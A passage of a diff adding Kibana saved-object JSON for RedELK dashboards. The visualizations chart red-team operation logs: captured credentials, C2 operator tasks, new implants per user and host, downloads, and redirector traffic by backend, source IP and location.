"kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Credentials over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Credentials captured" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-30d", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "bottom", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Credentials captured" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Credentials captured" + }, + "type": "value" + } + ] + }, + "title": "RedELK - Credentials over time", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "ab609c60-d319-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "3fabe620-6c38-11ea-97d6-55783aed877a", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 162 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - MITRE ATT&CK Techniques tag cloud", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "signal.rule.threat.technique.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 300 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 58, + "minFontSize": 14, + "orientation": "single", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "scale": "linear", + "showLabel": false + }, + "title": "RedELK - MITRE ATT&CK Techniques tag cloud", + "type": "tagcloud" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "abdcd940-d050-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 164 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Tasks per C2 operator", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Tasks launched" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-1d", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "user.name", + "missingBucket": true, + "missingBucketLabel": "Unknown user", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Tasks launched" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Tasks launched" + }, + "type": "value" + } + ] + }, + "title": "RedELK - Tasks launched per operator", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 166 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Hosts total unique count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Hosts", + "field": "host.name" + }, + "schema": "metric", + "type": "cardinality" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Hosts total unique count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 168 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Downloads total count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Downloads" + }, + "schema": "metric", + "type": "count" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - CS - Downloads total count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 170 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - HTTP Redir traffic over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "redir.backend.name : c2* and tags : \"iplist_customer\"" + }, + "label": "C2 traffic - Customer" + }, + { + "input": { + "language": "kuery", + "query": "redir.backend.name : c2* and tags : \"iplist_redteam\" " + }, + "label": "C2 traffic - Red team tests" + }, + { + "input": { + "language": "kuery", + "query": "redir.backend.name : c2* and not tags: \"iplist_customer\" and not tags : \"iplist_redteam\" " + }, + "label": "C2 traffic - Other" + }, + { + "input": { + "language": "kuery", + "query": "not redir.backend.name : c2*" + }, + "label": "Non-C2 traffic" + } + ] + }, + "schema": "group", + "type": "filters" + }, + { + "enabled": true, + "id": "3", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-1w", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "fittingFunction": "linear", + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": {}, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Count" + }, + "drawLinesBetweenPoints": true, + "interpolate": "linear", + "lineWidth": 2, + "mode": "normal", + "show": true, + "showCircles": true, + "type": "line", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "line", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Count" + }, + "type": "value" + } + ] + }, + "title": "RedELK - HTTP Redir traffic over time", + "type": "line" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "be08d380-efe9-11eb-8a9f-2572da287875", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 172 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - HTTP Redir traffic source table", + "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Hits" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Source IP", + "field": "source.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "bucket", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "AS Organisation", + "field": "source.as.organization.name", + "missingBucket": true, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 1 + }, + "schema": "bucket", + "type": "terms" + }, + { + "enabled": true, + "id": "4", + "params": { + "customLabel": "Country", + "field": "source.geo.country_iso_code", + "missingBucket": true, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 1 + }, + "schema": "bucket", + "type": "terms" + } + ], + "params": { + "perPage": 10, + "percentageCol": "Hits", + "showMetricsAtAllLevels": false, + "showPartialRows": true, + "showToolbar": true, + "showTotal": true, + "sort": { + "columnIndex": null, + "direction": null + }, + "totalFunc": "sum" + }, + "title": "RedELK - HTTP Redir traffic source table", + "type": "table" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "cbb7d710-efee-11eb-8a9f-2572da287875", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 174 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Tasks execution timeframe", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "First task", + "field": "@timestamp" + }, + "schema": "metric", + "type": "min" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Last task", + "field": "@timestamp" + }, + "schema": "metric", + "type": "max" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 24, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Tasks execution timeframe", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "ce581930-d361-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 176 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "RedELK - Target host and user selector", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [], + "params": { + "controls": [ + { + "fieldName": "host.name", + "id": "1595867425052", + "indexPatternRefName": "control_0_index_pattern", + "label": "Target host(s)", + "options": { + "dynamicOptions": true, + "multiselect": true, + "order": "desc", + "size": 5, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "user.name", + "id": "1595867451919", + "indexPatternRefName": "control_1_index_pattern", + "label": "Target user(s)", + "options": { + "dynamicOptions": true, + "multiselect": true, + "order": "desc", + "size": 5, + "type": "terms" + }, + "parent": "", + "type": "list" + } + ], + "pinFilters": false, + "updateFiltersOnChange": true, + "useTimeFilter": false + }, + "title": "RedELK - Target host and user selector", + "type": "input_control_vis" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "rtops", + "name": "control_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "control_1_index_pattern", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 179 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - HTTP Redir traffic per backend", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "redir.backend.name : c2*" + }, + "label": "C2 traffic" + }, + { + "input": { + "language": "kuery", + "query": "not redir.backend.name : c2*" + }, + "label": "Non-C2 traffic" + } + ] + }, + "schema": "segment", + "type": "filters" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "Backend", + "field": "redir.backend.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 20 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - HTTP Redir traffic per backend", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "d625ba60-efe8-11eb-8a9f-2572da287875", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 181 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Credentials total count", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Credentials" + }, + "schema": "metric", + "type": "count" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - Credentials total count", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "dcf86190-d319-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "3fabe620-6c38-11ea-97d6-55783aed877a", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 183 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "c2.log.type: implant_newimplant" + } + } + }, + "title": "RedELK - New implants over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Amount of implants" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1 + }, + "schema": "segment", + "type": "date_histogram" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "fittingFunction": "linear", + "grid": { + "categoryLines": true, + "style": { + "color": "#eee" + }, + "valueAxis": null + }, + "isVislibVis": true, + "legendPosition": "top", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Amount of implants" + }, + "drawLinesBetweenPoints": true, + "interpolate": "linear", + "lineWidth": 5, + "mode": "stacked", + "show": "true", + "showCircles": true, + "type": "line", + "valueAxis": "ValueAxis-1" + } + ], + "times": [], + "type": "line", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Amount of implants" + }, + "type": "value" + } + ] + }, + "title": "New implants over time", + "type": "line" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 185 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + } + } + }, + "title": "RedELK - Redirector Traffic All", + "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Source IP", + "field": "source.ip" + }, + "schema": "metric", + "type": "cardinality" + }, + { + "enabled": true, + "id": "2", + "params": { + "autoPrecision": true, + "customLabel": "", + "field": "source.geo.location", + "isFilteredByCollar": true, + "precision": 2, + "useGeocentroid": true + }, + "schema": "segment", + "type": "geohash_grid" + } + ], + "params": { + "addTooltip": true, + "colorSchema": "Blues", + "heatClusterSize": 1.5, + "isDesaturated": true, + "legendPosition": "bottomright", + "mapCenter": [ + 0, + 0 + ], + "mapType": "Heatmap", + "mapZoom": 2, + "wms": { + "baseLayersAreLoaded": {}, + "enabled": false, + "options": { + "format": "image/png", + "transparent": true + }, + "selectedTmsLayer": { + "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", + "id": "road_map", + "maxZoom": 18, + "minZoom": 0, + "subdomains": [], + "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" + }, + "tmsLayers": [ + { + "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", + "id": "road_map", + "maxZoom": 18, + "minZoom": 0, + "subdomains": [], + "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" + } + ] + } + }, + "title": "RedELK - Redirector Traffic All", + "type": "tile_map" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "redirtraffic", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 187 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "implant_newimplant" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "implant_newimplant" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "RedELK - Implant per top users with computers", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Amount of implants" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Username", + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 20 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "Computername", + "field": "host.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 50 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 200 + }, + "position": "left", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false, + "style": { + "color": "#eee" + } + }, + "isVislibVis": true, + "labels": {}, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Amount of implants" + }, + "drawLinesBetweenPoints": true, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-2" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-2", + "labels": { + "filter": true, + "rotate": 75, + "show": true, + "truncate": 100 + }, + "name": "BottomAxis-1", + "position": "bottom", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Amount of implants" + }, + "type": "value" + } + ] + }, + "title": "RedELK - Implant per top users with computers", + "type": "horizontal_bar" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 190 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Redirector traffic alarmed IP over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Total hits" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-30h", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "Alarmed IPs", + "field": "source.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other IPs", + "size": 10 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Total hits" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Total hits" + }, + "type": "value" + } + ] + }, + "title": "RedELK - Redirector traffic alarmed IP over time", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 192 + ], + "type": "visualization", 